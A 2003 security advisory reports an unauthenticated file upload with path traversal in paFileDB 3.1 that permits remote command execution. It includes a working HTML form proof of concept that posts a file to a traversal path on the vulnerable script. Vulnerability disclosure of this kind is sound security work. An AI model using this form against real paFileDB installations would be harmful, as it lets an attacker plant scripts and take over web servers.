paFileDB 3.1 OS-Cmd execution

[24.07.2003] paFileDB 3.1 OS-Cmd execution

 

============================

Security REPORT paFileDB 3.1

============================

 

Product: paFileDB Version 3.1 (and earlier)

Vulnerablities: arbitrary file-upload, path-traversal, arbitrary OS command-execution

Vuln.-classes: www.owasp.org/asac/parameter_manipulation/forms.shtml

www.owasp.org/asac/input_validation/os.shtml

www.owasp.org/asac/input_validation/pt.shtml

Vendor: php arena (http://www.phparena.net/)

Vendor-Status: contacted thru mailform (http://www.phparena.net/mail.php) 26.06.2003

Vendor-Patch: forums.phparena.net/index.php

 

Exploitable:

Local: NO

Remote: YES

 

============

Introduction

============

 

(taken from website)

---*---

paFileDB is designed to allow webmasters have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file.

---*---

 

 

=====================

Vulnerability Details

=====================

 

 

1) ARBITRARY FILE UPLOAD

========================

 

the script "/includes/team/file.php" (and maybe others) does not check for a valid session.

therefore it is possible to upload arbitrary files by creating/modifying a single form-parameter.

 

Form-example:

---*---
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php">
<input name="userfile" TYPE="file">

<input name="userfile_name" TYPE="text" value="../../../uploads/makeawish">

<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
---*---

 

2) ARBITRARY OS-COMMAND EXECUTION

=================================

 

by uploading program- or script-files.

 

 

 

Severity: HIGH

 

 

=======

Remarks

=======

 

---

 

====================

Recommended Hotfixes

====================

 

software patch.

 

 

EOF Martin Eiszner / @2003WebSec.org

 

 

=======

Contact

=======

 

SEC Consult Unternehmensberatung GmbH / Martin Eiszner

Blindengasse 3

1080 Vienna

 

Austria / EUROPE

 

m dot eiszner at sec-consult dot com

www.sec-consult.com